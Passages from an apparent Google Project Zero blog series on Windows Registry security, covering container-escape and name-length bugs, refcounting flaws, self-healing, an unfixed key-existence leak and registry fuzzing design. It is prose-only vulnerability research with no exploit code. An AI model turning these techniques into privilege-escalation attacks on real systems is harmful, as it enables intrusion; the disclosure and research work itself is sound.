isolate the registry in well supported use-cases (such as running Docker containers), it should ideally not be trivial to bypass, but I was unable to find any official statement to support or refute this assumption. When I looked further into it, I discovered that the redirection of registry calls within containerized environments was managed by registry callbacks, specifically one called VrpRegistryCallback. While callbacks do indeed seem well suited for this purpose, the devil is in the details – specifically, error handling. I found at least two ways a containerized application could trigger an error during the execution of the internal VrpPreOpenOrCreate/VrpPostOpenOrCreate handlers. This resulted in exiting the callback prematurely while an important part of the redirection logic still hadn't been executed, and consequently led to the process gaining access to the host's registry view. Additionally, I found that another logical bug allowed access to the host's registry through differencing hives associated with other active containers in the system. As I mentioned, I wasn't entirely clear on the state of Microsoft's support for this mechanism, but luckily I didn't have to wonder for too long. It turned out that James Forshaw had a similar dilemma and managed to reach an understanding with the vendor on the matter, which he described in his blog post. After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. [...] Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege. Eventually, I reported all three bugs in one report, and Microsoft fixed them shortly after as CVE-2023-36576. I particularly like the first issue described in the report (the bug in VrpBuildKeyPath), as it makes a very interesting example of how a theoretically low-level issue like a 16-bit integer overflow can have the high-level consequences of a container escape, without any memory corruption being involved.Adherence to official key and value name length limits The constraints on the length of key and value names are quite simple. Microsoft defines the maximum values on a dedicated documentation page called Registry Element Size Limits: Registry element Size limit Key name 255 characters. The key name includes the absolute path of the key in the registry, always starting at a base key, for example, HKEY_LOCAL_MACHINE. Value name 16,383 characters. Windows 2000: 260 ANSI characters or 16,383 Unicode characters. Admittedly, the way this is worded is quite confusing, and I think it would be better if the information in the second column simply ended after the first period. As it stands, the explanation for "key name" seems to suggest that the 255-character limit applies to the entire key path relative to the top-level key. In reality, the limit of 255 (or to be precise, 256) characters applies to the individual name of each registry key, and value names are indeed limited to 16,383 characters. These assumptions are the basis for the entire registry code. Despite these being fundamental and documented values, it might be surprising that the requirements weren't correctly verified in the hive loading code until October 2022. Specifically, it was possible to load a hive containing a key with a name of up to 1040 characters. Furthermore, the length of a value's name wasn't checked at all, meaning it could consist of up to 65535 characters, which is the maximum value of the uint16 type representing its length. In both cases, it was possible to exceed the theoretical limits set by the documentation by more than four times. I reported these bugs as part of the CVE-2022-37991 report. On a default Windows installation, I found a way to potentially exploit (or at least trigger a reproducible crash) the missing check for the value name length, but I couldn't demonstrate the consequences of an overly long key name. Nevertheless, I'm convinced that with a bit more research, one could find an application or driver implementing a registry callback that assumes key names cannot be longer than 255 characters, leading to a buffer overflow or other memory corruption. This example clearly shows that even the official documentation cannot be trusted, and all assumptions, even the most fundamental ones, must be verified directly in the code during vulnerability research.Creation of stable keys under volatile ones Another rational behavior of the registry is that it doesn't allow you to create Stable keys under Volatile parent keys. This makes sense, as stable keys are stored on disk and persist through hive unload and system reboot, whereas volatile keys only exist in memory and vanish when the hive is unloaded. Consequently, a stable key under a volatile one wouldn't be practical, as its parent would disappear after a restart, severing its path to the registry tree root, causing the stable key to disappear as well. Therefore, under normal conditions, creating such a key is impossible, and any attempts to do so results in the  ERROR_CHILD_MUST_BE_VOLATILE error being returned to the caller. While there's no official mention of this in the documentation (except for a brief description of the error code), Raymond Chen addressed it on his blog, providing at least some documentation of this behavior. During my research, I discovered two ways to bypass this requirement and create stable keys under volatile ones. These were issues CVE-2023-21748 and CVE-2024-26173, where the first one was related to registry virtualization, and the second to transaction support. Interestingly, in both of these cases, it was clear that a certain invariant in the registry design was being broken, but it was less clear whether this could have any real consequences for system security. After spending some time on analysis, I came to the conclusion that there was at least a theoretical chance of some security impact, due to the fact that security descriptors of volatile keys are not linked together into a global linked list in the same way stable security descriptors are. Long story short, if later in time some other stable keys in the hive started to share the security descriptor of the stable-under-volatile one, then their security would become invalidated and forcibly reset to their parent's descriptor on the next system reboot, violating the security model of the registry. Microsoft apparently shared my assessment of the situation, as they decided to fix both bugs as part of a security bulletin. Still, this is an interesting illustration of the complexity of the registry – sometimes finding an anomaly in the kernel logic can generate some kind of inconsistent state, but its implications might not be clear without further, detailed analysis.Arbitrary key existence information leak If someone were to ask me whether an unprivileged user should be able to check for the existence of a registry key without having any access rights to that key or its parent in a secure operating system, I would say absolutely not. However, this is possible on Windows, because the code responsible for opening keys first performs a full path lookup, and only then checks the access rights. This allows for differentiation between existing keys (return value STATUS_ACCESS_DENIED) and non-existing keys (return value STATUS_OBJECT_NAME_NOT_FOUND). After discovering this behavior, I decided to report it to Microsoft in December 2023. The vendor's response was that it is indeed a bug, but its severity is not high enough to be fixed as an official vulnerability. I somewhat understand this interpretation, as the amount of information that can be disclosed in this way is quite low (i.e. limited configuration elements of other users), and fixing the issue would probably involve significant code refactoring and a potential performance decrease.  It's also difficult to say whether this type of boundary is properly defensible, because after one fix it might turn out that there are many other ways to leak this type of information. Therefore, the technique described in my report still works at the time of writing this blog post.Miscellaneous In addition to the bug classes mentioned above, there are also many other types of issues that can occur in the registry. I certainly won't be able to name them all, but briefly, here are a few more primitives that come to mind when I think about registry vulnerabilities:Low-severity security bugs: These include local DoS issues such as NULL pointer dereferences, infinite loops, direct KeBugCheckEx calls, as well as classic memory leaks, low-quality out-of-bounds reads, and others. The details of a number of such bugs can be found in the p0tools/WinRegLowSeverityBugs repository on GitHub.Real, but unexploitable bugs: These are bugs that are present in the code, but cannot be exploited due to some mitigating factors. Examples include bugs in the CmpComputeComponentHashes and HvCheckBin internal functions.Memory management bugs: These bugs are specifically related to the management of hive section views in the context of the Registry process. This especially applies to situations where the hive is loaded from a file on a removable drive, from a remote SMB share, or from a file on a local disk but with unusual semantics (e.g., a placeholder file created through the Cloud Filter API). Two examples of this vulnerability type are CVE-2024-43452 and CVE-2024-49114.Unusual primitives: These are various non standard primitives that are simply too difficult to categorize, such as CVE-2024-26177, CVE-2024-26178, WinRegLowSeverityBugs #19, or WinRegLowSeverityBugs #20.Fuzzing considerations Due to the Windows Registry's strictly defined format (regf) and interface (around a dozen specific syscalls that operate on it), automated testing in the form of fuzzing is certainly possible. We are dealing with kernel code here, so it's not as simple as taking any library that parses a file format and connecting it to a standard fuzzer like AFL++, Honggfuzz, or Jackalope – registry fuzzing requires a bit more work. But, in its simplest form, it could consist of just a few trivial steps: finding an existing regf file, writing a bit-flipping mutator, writing a short harness that loads the hive using RegLoadAppKey, and then running those two programs in an infinite loop and waiting for the system to crash. It's hard to argue that this isn't some form of fuzzing, and in many cases, these kinds of methods are perfectly sufficient for finding plenty of serious vulnerabilities. After all, my entire months-long research project started with this fairly primitive fuzzing, which did more or less what I described above, with just a few additional improvements:Fixing the hash in the regf header,Performing a few simple operations on the hive, like enumerating subkeys and values,Running on multiple machines at once,Collecting code coverage information from the Windows kernel. Despite my best efforts, this type of fuzzing was only able to find one vulnerability (CVE-2022-35768), compared to over 50 that I later discovered manually by analyzing the Windows kernel code myself. This ratio doesn't speak well for fuzzing, and it stems from the fact that the registry isn't as simple a target for automated testing as it might seem. On the contrary, each individual element of such fuzzing is quite difficult and requires a large time investment if one wishes to do it effectively. In the following sections, I'll focus on each of these components (corpus, mutator, harness and bug detection), pointing out what I think could be improved in them compared to the most basic version discussed above.Initial corpus The first issue a potential researcher may encounter is gathering an initial corpus of input files. Sure, one can typically find dozens of regf files even on a clean Windows installation, but the problem is that they are all very simple and don't exhibit characteristics interesting from a fuzzing perspective. In particular:All of these hives are generated by the same registry implementation, which means that their state is limited to the set of states produced by Windows, and not the wider set of states accepted by the hive loader.The data structures within them are practically never even close to the limits imposed by the format itself, for example:The maximum length of key and value names are 256 and 16,383 characters, but most names in standard hives are shorter than 30 characters.The maximum nesting depth of the tree is 512 levels, but in most hives, the nesting doesn't exceed 10 levels.The maximum number of keys and values in a hive is limited only by the maximum space of 2 GiB, but standard hives usually include at most a few subkeys and associated values – certainly not the quantities that could trigger any real bugs in the code. This means that gathering a good initial corpus of hives is very difficult, especially considering that there aren't many interesting regf hives available on the Internet, either. The other options are as follows: either simply accept the poor starting corpus and hope that these shortcomings will be made up for by a good mutator (see next section), especially if combined with coverage-based fuzzing, or try to generate a better one yourself by writing a generator based on one of the existing interfaces (the kernel registry implementation, the user-mode Offline Registry Library, or some other open-source library). As a last resort, you could also write your own regf file generator from scratch, where you would have full control over every aspect of the format and could introduce any variance at any level of abstraction. The last approach is certainly the most ambitious and time-consuming, but could potentially yield the best results.Mutator Overall, the issue with the mutator is very similar to the issue with the initial corpus. In both cases, the goal is to generate the most "interesting" regf files possible, according to some metric. However, in this case, we can no longer ignore the problem and hope for the best. If the mutator doesn't introduce any high-quality changes to the input file, nothing else will. There is no way around it – we have to figure out how to make our mutator test as much state of the registry implementation as possible. For simplicity, let's assume the simplest possible mutator that randomly selects N bits in the input data and flips them, and/or selects some M bytes and replaces them with other random values. Let's consider for a moment what logical types of changes this approach can introduce to the hive structure:Enable or disable some flags, e.g., in the _CM_KEY_NODE.Flags field,Change the value of a field indicating the length of an array or list, e.g., _CM_KEY_NODE.NameLength, _CM_KEY_VALUE.DataLength, or a 32-bit field indicating the size of a given cell,Slightly change the name of a key or value, or the data in the backing cell of a value,Corrupt a value sanitized during hive loading, causing the object to be removed from the hive during the self-healing process,Change the value of some cell index, usually to an incorrect value,Change/corrupt the binary representation of a security descriptor in some way. This may seem like a broad range of changes, but in fact, each of them is very local and uncoordinated with other modifications in the file. This can be compared to binary mutation of an XML file – sometimes we may corrupt/remove some critical tag or attribute, or even change some textually encoded number to another valid number – but in general, we should not expect any interesting structural changes to occur, such as changing the order of objects, adding/removing objects, duplicating objects, etc. Hives are very similar in nature. For example, it is possible to set the KEY_SYM_LINK flag in a key node by pure chance, but for this key to actually become a valid symlink, it is also necessary to remove all its current values, ​​and add a new value named "SymbolicLinkValue" of type REG_LINK containing a fully qualified registry path. With a mutator operating on single bits and bytes, the probability of this happening is effectively zero. In my opinion, a dedicated regf mutator would need to operate simultaneously on four levels of abstraction, in order to be able to create the conditions necessary for triggering most bugs:On the high-level structure of a hive, where only logical objects matter: keys, values, security descriptors, and the relationships between them. Mutations could involve adding, removing, copying, moving, and changing the internal properties of these three main object types. These mutations should generally conform to the regf format, but sometimes push the boundaries by testing edge cases like handling long names, a large number of subkeys or values, or a deeply nested tree.On the level of specific cell types, which can represent the same information in many different ways. This primarily refers to all kinds of lists that connect higher-level objects, particularly subkey lists (index leaves, fast leaves, hash leaves, root indexes), value lists, and linked lists of security descriptors. Where permitted by the format (or sometimes even in violation of the format), the internal representation of these lists could be changed, and its elements could be rearranged or duplicated.On the level of cell and bin layout: taking the entire set of interconnected cells as input, they could be rearranged in different orders, in bins of different sizes, sometimes interspersed with empty (or artificially allocated) cells or bins. This could be used to find vulnerabilities specifically related to hive memory management, and also to potentially facilitate triggering/reproducing hive memory corruption issues more reliably.On the level of bits and bytes: although this technique is not very effective on its own, it can complement more intelligent mutations. You never know what additional problems can be revealed through completely random changes that may not have been anticipated when implementing the previous ideas. The only caveat is to be careful with the number of those bit flips, as too many of them could negate the overall improvement achieved through higher-level mutations. As you can see, developing a good mutator requires some consideration of the hive at many levels, and would likely be a long and tedious process. The question also remains whether the time spent in this way would be worth it compared to the effects that can be achieved through manual code analysis. This is an open question, but as a fan of the registry, I would be thrilled to see an open-source project equivalent to fonttools for regf files, i.e., a library that allows "decompiling" hives into XML (or similar) and enables efficient operation on it. One can only dream... 🙂 Finally, I would like to point out that regf files are not the only type of input for which a dedicated mutator could be created. As I've already mentioned before, there are also accompanying .LOG1/.LOG2 and .blf/.regtrans-ms files, responsible for the atomicity of individual registry operations and KTM transactions, respectively. Both types of files may not be as complex as the core hive files, but mutating them might still be worthwhile, especially since some bugs have been historically found in their handling. Additionally, other registry operations performed by the harness could also be treated as part of the input. This would resemble an architecture similar to Syzkaller, and storing registry call sequences as part of the corpus would require writing a special grammar-based mutator, or possibly adapting an existing one.Harness While having a good mutator for registry-related files is a great start, the vast majority of potential vulnerabilities do not manifest when loading a malformed hive, but only during further operations on said hive. These bugs are mainly related to some complex and unexpected state that has arisen in the registry, and triggering it usually requires a very specific sequence of system calls. Therefore, a well-constructed harness should support a broad range of registry operations in order to effectively test as many different internal states as possible. In particular, it should:Perform all standard operations on keys (opening, creating, deleting, renaming, enumerating, setting properties, querying properties, setting notifications), values (setting, deleting, enumerating, querying data) and security descriptors (querying keys for security descriptors, setting new descriptors). For the best result, it would be preferable to randomize the values of their arguments (to a reasonable extent), as well as the order in which the operations are performed.Support a  "deferred close" mechanism, i.e. instead of closing key handles immediately, maintain a certain cache of such handles to refer to them at a later point in time. In particular, the idea is to sometimes perform an operation on a key that has been deleted, renamed or had its hive unloaded, in order to trigger potential bugs related to object lifetime or the verification that a given key actually exists prior to performing any action on it.Load input hives with different flags. The main point here is to load hives with and without the REG_APP_HIVE flag, as the differences in the treatment of app hives and regular hives are sometimes significant enough to warrant testing both scenarios. Randomizing the states of the other few flags that can take arbitrary values could also yield positive results.Support the registry virtualization mechanism, which can consist of several components:Periodically enabling and disabling virtualization for the current process using the SetTokenInformation(TokenVirtualizationEnabled) call,Setting various virtualization flags for individual keys using the NtSetInformationKey(KeySetVirtualizationInformation) call,Creating an additional key structure under the HKU\_Classes\VirtualStore tree to exercise the mechanism of key replication / merging state in "query" type operations (e.g. in enumeration of the values of a virtualized key).Use transactions, both KTM and lightweight. In particular, it would be useful to mix non-transactional calls with transactional ones, as well as transactional calls within different transactions. This way, we would be able to the code paths responsible for making sure that no two transactions collide with each other, and that non-transactional operations always roll back the entire transactional state before making any changes to the registry. It would also be beneficial if some of these transactions were committed and some rolled back, to test as much of their implementation as possible.Support layered keys. For many registry operations, the layered key implementation is completely different than the standard one, and almost always more complicated. However, adding differencing hive support to the fuzzer wouldn't be trivial, as it would require additional communication with VRegDriver to load/unload the hive. It would also require making some fundamental decisions: which hive(s) do we overlay our input hive on top of? Should we keep pairs of hives in the corpus and overlay them one on top of the other, in order to control the properties of all the keys on the layered key stack? Do we limit ourselves to a key stack of two elements, or create more complicated stacks consisting of three or more hives? These are all open questions to which I don't know the answer, but I am sure that implementing some form of layered key support would positively affect the number of vulnerabilities that could be found this way.Potentially support multi-threading and execute the harness logic in multiple threads at once, allowing it to trigger potential race conditions. The downside of this idea is that unless we run the fuzzing in some special environment, it would probably be non-deterministic, making timing-related bugs difficult to reproduce. The final consideration for harness development is the prevalence of registry issues caused by improper error handling, particularly cell allocator out-of-memory errors. A potential harness feature could be to artificially trigger these circumstances, perhaps by aggressively filling almost all of the 2 GiB stable/volatile space, causing HvAllocateCell/HvReallocateCell functions to fail. However, this approach would waste significant disk space and memory, and substantially slow down fuzzing, so the net benefit is unclear. Alternative options include hooking the allocator functions to make them fail for a specific fraction of requests (e.g., using DTrace), or applying a runtime kernel modification to reduce the maximum hive space size from 2 GiB to some smaller value (e.g., 16 MiB). These ideas are purely theoretical and would require further testing.Bug detection Alongside a good initial corpus, mutator and harness, the fourth and final pillar of an effective fuzzing session is bug detection. After all, what good is it to generate an interesting sample and trigger a problem with a series of complicated calls, if we don't even notice the bug occurring? In typical user-mode fuzzing, bug detection is assisted by tools such as AddressSanitizer, which are integrated into the build process and add extra instrumentation to the binary to enable the detection of all invalid memory references taking place in the code. In the case of the Windows kernel, a similar role is played by the Special Pool, which isolates individual allocations on kernel pools to maximize the probability of a crash when an out-of-bounds access/use-after-free condition occurs. Additionally, it may also be beneficial to enable the Low Resources Simulation mechanism, which can cause some pool allocations to fail and thus potentially help in triggering bugs related to handling OOM conditions. The challenge with the registry lies in the fact that most bugs don't stem from memory corruption within the kernel pools. Typically, we're dealing with either hive-based memory corruption or its early stage—an inconsistent state within the registry that violates a crucial invariant. Reaching memory corruption in such a scenario necessitates additional steps from an attacker. For instance, consider a situation where the reference count of a security descriptor is decremented without removing a reference to it in a key node. To trigger a system bugcheck, one would need to remove all other references to that security descriptor (e.g., by deleting keys), overwrite it with different data (e.g., by setting a value), and then perform an operation on it or one of its adjacent descriptors that would lead to a system crash. Each extra step significantly decreases the likelihood of achieving the desired state. The fact that cells have their own allocator further hinders fuzzing, as there's no equivalent of the Special Pool available for it. Here are a few ideas for addressing the problem, some more realistic than others:If we had a special library capable of breaking down regf files at various levels of abstraction, we could have the mutator create the input hive in a way that maximizes the chances of a crash if a bug occurs during a cell operation. For example, we could assign each key a separate security descriptor with refcount=1 (which should make triggering UAFs easier) and place each cell at the end of a separate bin, followed by another, empty bin. This behavior would be very similar to how the Special Pool works, but at the bin and cell level.Again, if we had a good regf file parser, we could open the hive saved on disk after each iteration of the harness and verify its internal consistency. This would allow us to catch inconsistent hive states early, even if they didn't lead to memory corruption or a system crash in a specific case.Possibly, instead of implementing the hive parsing and verification mechanism from scratch, one could try to reuse an existing implementation. In particular, an interesting idea would be to use the self-healing property of the registry. Thanks to this, after each iteration, we could theoretically load the hive once again for a short period of time, unload it, and then compare the "before" and "after" representations to see if the loader fixed any parts of the hive during the loading process. We could potentially also try to use the user-mode offreg.dll library for this purpose, which seems to share much of the hive loading code with the Windows kernel, and which would likely be more efficient to call.As part of testing a given hive in a harness, we could periodically fill the entire hive (or at least all its existing bins) with random data to increase the probability of detecting UAFs by overwriting freed objects with incorrect data. Finally, as an optional step, one could consider implementing checks at the harness level to identify logical issues in registry behavior. For example, after each individual operation, the harness could verify whether the process security token and handle access rights actually allowed it – thereby checking if the kernel correctly performed security access checks. Another idea would be to examine whether all operations within a transaction have been applied correctly during the commit phase. As we can see, there are many potential ideas, but when evaluating their potential usefulness, it is important to focus on the registry behaviors and API contracts that are most relevant to system security.Conclusion This concludes our exploration of the Windows Registry's role in system security and effective vulnerability discovery techniques. In the next post, we'll stay on the topic of security, but we'll shift our focus from discovering bugs to developing specific techniques for exploiting them. We'll use case studies of some experimental exploits I wrote during my research to demonstrate their practical security implications. See you then!

Posted by Mateusz Jurczyk, Google Project Zero In the first three blog posts of this series, I sought to outline what the Windows Registry actually is, its role, history, and where to find further information about it. In the subsequent three posts, my goal was to describe in detail how this mechanism works internally – from the perspective of its clients (e.g., user-mode applications running on Windows), the regf format used to encode hives, and finally the kernel itself, which contains its canonical implementation. I believe all these elements are essential for painting a complete picture of this subsystem, and in a way, it shows my own approach to security research. One could say that going through this tedious process of getting to know the target unnecessarily lengthens the total research time, and to some extent, they would be right. On the other hand, I believe that to conduct complete research, it is equally important to answer the question of how certain things are implemented, as well as why they are implemented that way – and the latter part often requires a deeper dive into the subject. And since I have already spent the time reverse engineering and understanding various internal aspects of the registry, there are great reasons to share the information with the wider community. There is a lack of publicly available materials on how various mechanisms in the registry work, especially the most recent and most complicated ones, so I hope that the knowledge I have documented here will prove useful to others in the future. In this blog post, we get to the heart of the matter, the actual security of the Windows Registry. I'd like to talk about what made a feature that was initially meant to be just a quick test of my fuzzing infrastructure draw me into manual research for the next 1.5 ~ 2 years, and result in Microsoft fixing (so far) 53 CVEs. I will describe the various areas that are important in the context of low-level security research, from very general ones, such as the characteristics of the codebase that allow security bugs to exist in the first place, to more specific ones, like all possible entry points to attack the registry, the impact of vulnerabilities and the primitives they generate, and some considerations on effective fuzzing and where more bugs might still be lurking. Let's start with a quick recap of the registry's most fundamental properties as an attack surface: Local attack surface for privilege escalation: As we already know, the Windows Registry is a strictly local attack surface that can potentially be leveraged by a less privileged process to gain the privileges of a higher privileged process or the kernel. It doesn't have any remote components except for the Remote Registry service, which is relatively small and not accessible from the Internet on most Windows installations.Complex, old codebase in a memory-unsafe language: The Windows Registry is a vast and complex mechanism, entirely written in C, most of it many years ago. This means that both logic and memory safety bugs are likely to occur, and many such issues, once found, would likely remain unfixed for years or even decades.Present in the core NT kernel: The registry implementation resides in the core Windows kernel executable (ntoskrnl.exe), which means it is not subject to mitigations like the win32k lockdown. Of course, the reachability of each registry bug needs to be considered separately in the context of specific restrictions (e.g., sandbox), as some of them require file system access or the ability to open a handle to a specific key. Nevertheless, being an integral part of the kernel significantly increases the chances that a given bug can be exploited.Most code reachable by unprivileged users: The registry is a feature that was created for use by ordinary user-mode applications. It is therefore not surprising that the vast majority of registry-related code is reachable without any special privileges, and only a small part of the interface requires administrator rights. Privilege escalation from medium IL (Integrity Level) to the kernel is probably the most likely scenario of how a registry vulnerability could be exploited.Manages sensitive information: In addition to the registry implementation itself being complex and potentially prone to bugs, it's important to remember that the registry inherently stores security-critical system information, including various global configurations, passwords, user permissions, and other sensitive data. This means that not only low-level bugs that directly allow code execution are a concern, but also data-only attacks and logic bugs that permit unauthorized modification or even disclosure of registry keys without proper permissions.Not trivial to fuzz, and not very well documented: Overall, it seems that the registry is not a very friendly target for bug hunting without any knowledge of its internals. At the same time, obtaining the information is not easy either, especially for the latest registry mechanisms, which are not publicly documented and learning about them basically boils down to reverse engineering. In other words, the entry bar into this area is quite high, which can be an advantage or a disadvantage depending on the time and commitment of a potential researcher.Security properties The above cursory analysis seems to indicate that the registry may be a good audit target for someone interested in EoP bugs on Windows.  Let's now take a closer look at some of the specific low-level reasons why the registry has proven to be a fruitful research objective.Broad range of bug classes Due to the registry being both complex and a central mechanism in the system operating with kernel-mode privileges, numerous classes of bugs can occur within it. An example vulnerability classification is presented below: Hive memory corruption: Every invasive operation performed on the registry (i.e., a "write" operation) is reflected in changes made to the memory-mapped view of the hive's structure. Considering that objects within the hive include variable-length arrays, structures with counted references, and references to other cells via cell indexes (hives' equivalent of memory pointers), it's natural to expect common issues like buffer overflows or use-after-frees.Pool memory corruption: In addition to hive memory mappings, the Configuration Manager also stores a significant amount of information on kernel pools. Firstly, there are cached copies of certain hive data, as described in my previous blog post. Secondly, there are various auxiliary objects, such as those allocated and subsequently released within a single system call. Many of these objects can fall victim to memory management bugs typical of the C language.Information disclosure: Because the registry implementation is part of the kernel, and it exchanges large amounts of information with unprivileged user-mode applications, it must be careful not to accidentally disclose uninitialized data from the stack or kernel pools to the caller. This can happen both through output data copied to user-mode memory and through other channels, such as data leakage to a file (hive file or related log file). Therefore, it is worthwhile to keep an eye on whether all arrays and dynamically allocated buffers are fully populated or carefully filled with zeros before passing them to a lower-privileged context.Race conditions: As a multithreaded environment, Windows allows for concurrent registry access by multiple threads. Consequently, the registry implementation must correctly synchronize access to all shared kernel-side objects and be mindful of "double fetch" bugs, which are characteristic of user-mode client interactions.Logic bugs: In addition to being memory-safe and free of low-level bugs, a secure registry implementation must also enforce correct high-level security logic. This means preventing unauthorized users from accessing restricted keys and ensuring that the registry operates consistently with its documentation under all circumstances. This requires a deep understanding of both the explicit documentation and the implicit assumptions that underpin the registry's security from the kernel developers. Ultimately, any behavior that deviates from expected logic, whether documented or assumed, could lead to vulnerabilities.Inter-process attacks: The registry can serve as a security target, but also as a means to exploit flaws in other applications on the system. It is a shared database, and a local attacker has many ways to indirectly interact with more privileged programs and services. A simple example is when privileged code sets overly permissive permissions on its keys, allowing unauthorized reading or modification. More complex cases can occur when there is a race condition between key creation and setting its restricted security descriptor, or when a key modification involving several properties is not performed transactionally, potentially leading to an inconsistent state. The specifics depend on how the privileged process uses the registry interface. If I were to depict the Windows Registry in a single Venn diagram, highlighting its various possible bug classes, it might look something like this: Manual reference counting As I have mentioned multiple times, security descriptors in registry hives are shared by multiple keys, and therefore, must be reference counted. The field responsible for this is a 32-bit unsigned integer, and any situation where it's set to a value lower than the actual number of references can result in the release of that security descriptor while it's still in use, leading to a use-after-free condition and hive-based memory corruption. So, we see that it's absolutely critical that this refcounting is implemented correctly, but unfortunately, there are (or were until recently) many reasons why this mechanism could be prone to bugs: Usually, a reference count is a construct that exists strictly in memory, where it is initialized with a value of 1, then incremented and decremented some number of times, and finally drops to zero, causing the object to be freed. However, with registry hives, the initial refcount values are loaded from disk, from a file that we assume is controlled by the attacker. Therefore, these values cannot be trusted in any way, and the first necessary step is to actually compare and potentially adjust them according to the true number of references to each descriptor. Even though this is done in theory, bugs can creep into this logic in practice (CVE-2022-34707, CVE-2023-38139).For a long time, all operations on reference counts were performed by directly referencing the _CM_KEY_SECURITY.ReferenceCount field, instead of using a secure wrapper. As a result, none of these incrementations were protected against integer overflow. This meant that not only a too small, but also a too large refcount value could eventually overflow and lead to a use-after-free situation (CVE-2023-28248, CVE-2024-43641). This weakness was gradually addressed in various places in the registry code between April 2023 and November 2024. Currently, all instances of refcount incrementation appear to be secure and involve calling the special helper function CmpKeySecurityIncrementReferenceCount, which protects against integer overflow. Its counterpart for refcount decrementation is CmpKeySecurityDecrementReferenceCount.It seems that there is a lack of clarity and understanding of how certain special types of keys, such as predefined keys and tombstone keys, behave in relation to security descriptors. In theory, the only type of key that does not have a security descriptor assigned to it is the exit node (i.e., a key with the KEY_HIVE_EXIT flag set, found solely in the virtual hive rooted at \Registry\), while all other keys do have a security descriptor assigned to them, even if it is not used for anything. In practice, however, there have been several vulnerabilities in Windows that resulted either from incorrect security refresh in KCB for special types of keys (CVE-2023-21774), from releasing the security descriptor of a predefined key without considering its reference count (CVE-2023-35356), or from completely forgetting the need for reference counting the descriptors of tombstone keys in the "rename" operation (CVE-2023-35382).When the reference count of a security descriptor reaches zero and is released, this operation is irreversible. There is no guarantee that upon reallocation, the descriptor would have the same cell index, or even that it could be reallocated at all. This is crucial for multi-step operations where individual actions could fail, necessitating a full rollback to the original state. Ideally, releasing security descriptors should always be the final step, only when the kernel can be certain that the entire operation will succeed. A vulnerability exemplifying this is CVE-2023-21772, where the registry virtualization code first released the old security descriptor and then attempted to allocate a new one. If the allocation failed, the key was left without any security properties, violating a fundamental assumption of the registry and potentially having severe consequences for system memory safety.Aggressive self-healing and recovery As I described in blog post #5, one of the registry's most interesting features, which distinguishes it from many other file format implementations, is that it is self-healing. The entire hive loading process, from the internal CmCheckRegistry function downwards, is focused on loading the database at all costs, even if some corrupted fragments are encountered. Only if the file damage is so extensive that recovering any data is impossible does the entire loading process fail. Of course, given that the registry stores critical system data such as its basic configuration, and the lack of access to this data virtually prevents Windows from booting, this decision made a lot of sense from the system reliability point of view. It's probably safe to assume that it has prevented the need for system reinstallation on numerous computers, simply because it did not reject hives with minor damage that might have appeared due to random hardware failure. However, from a security perspective, this behavior is not necessarily advantageous. Firstly, it seems obvious that upon encountering an error in the input data, it is simpler to unconditionally halt its processing rather than attempt to repair it. In the latter case, it is possible for the programmer to overlook an edge case – forget to reset some field in some structure, etc. – and thus instead of fixing the file, allow for another unforeseen, inconsistent state to materialize within it. In other words, the repair logic constitutes an additional attack surface, and one that is potentially even more interesting and error-prone than other parts of the implementation. A classic example of a vulnerability associated with this property is CVE-2023-38139. Secondly, in my view, the existence of this logic may have negatively impacted the secure development of the registry code, perhaps by leading to a discrepancy between what it guaranteed and what other developers thought it had guaranteed. For example, in 1991–1993, when the foundations of the Configuration Manager subsystem were being created in their current form, probably no one considered hive loading a potential attack vector. At that time, the registry was used only to store system configuration, and controlled hive loading was privileged and required admin rights. Therefore, I suspect that the main goal of hive checking at that time was to detect simple data inconsistencies due to hardware problems, such as single bit flips. No one expected a hive to contain a complex, specially crafted multi-kilobyte data structure designed to trigger a security flaw. Perhaps the rest of the registry code was written under the assumption that since data sanitization and self-healing occurred at load time, its state was safe from that point on and no further error handling was needed (except for out-of-memory errors). Then, in Windows Vista, a decision was made to open access to controlled hive loading by unprivileged users through the app hive mechanism, and it suddenly turned out that the existing safeguards were not entirely adequate. Attackers now became able to devise data constructs that were structurally correct at the low level, but completely beyond the scope of what the actual implementation expected and could handle. Finally, self-healing can adversely affect system security by concealing potential registry bugs that could trigger during normal Windows operation. These problems might only become apparent after a period of time and with a "build-up" of enough issues within the hive. Because hives are mapped into memory, and the kernel operates directly on the data within the file, there exists a category of errors known as "inconsistent hive state". This refers to a data structure within the hive that doesn't fully conform to the file format specification. The occurrence of such an inconsistency is noteworthy in itself and, for someone knowledgeable about the registry, it could be a direct clue for finding vulnerabilities. However, such instances rarely cause an immediate system crash or other visible side effects. Consider security descriptors and their reference counting: as mentioned earlier, any situation where the active number of references exceeds the reference count indicates a serious security flaw. However, even if this were to happen during normal system operation, it would require all other references to that descriptor to be released and then for some other data to overwrite the freed descriptor. Then, a dangling reference would need to be used to access the descriptor. The occurrence of all these factors in sequence is quite unlikely, and the presence of self-healing further decreases these chances, as the reference count would be restored to its correct value at the next hive load. This characteristic can be likened to wrapping the entire registry code in a try/except block that catches all exceptions and masks them from the user. This is certainly helpful in the context of system reliability, but for security, it means that potential bugs are harder to spot during system run time and, for the same reason, quite difficult to fuzz. This does not mean that they don't exist; their detection just becomes more challenging.Unclear boundaries between hard and conventional format requirements This point is related to the previous section. In the regf format, there are certain requirements that are fairly obvious and must be always met for a file to be considered valid. Likewise, there are many elements that are permitted to be formatted arbitrarily, at the discretion of the format user. However, there is a third category, a gray area of requirements that seem reasonable and probably would be good if they were met, but it is not entirely clear whether they are formally required. Another way to describe this set of states is one that is not generated by the Windows kernel itself but is still not obviously incorrect. From a researcher's perspective, it would be worthwhile to know which parts of the format are actually required by the specification and which are only a convention adopted by the Windows code. We might never find out, as Microsoft hasn't published an official format specification and it seems unlikely that they will in the future. The only option left for us is to rely on the implementation of the CmpCheck* functions (CmpCheckKey, CmpCheckValueList, etc.) as a sort of oracle and assume that everything there is enforced as a hard requirement, while all other states are permissible. If we go down this path, we might be in for a big surprise, as it turns out that there are many logical-sounding requirements that are not enforced in practice. This could allow user-controlled hives to contain constructs that are not obviously problematic, but are inconsistent with the spirit of the registry and its rules. In many cases, they allow encoding data in a less-than-optimal way, leading to unexpected redundancy. Some examples of such constructs are presented below: Values with duplicate names within a single key: Under normal conditions, only one value with a given name can exist in a key, and if there is a subsequent write to the same name, the new data is assigned to the existing value. However, the uniqueness of value names is not required in input hives, and it is possible to load a hive with duplicate values.Duplicate identical security descriptors within a single hive: Similar to the previous point, it is assumed that security descriptors within a hive are unique, and if an 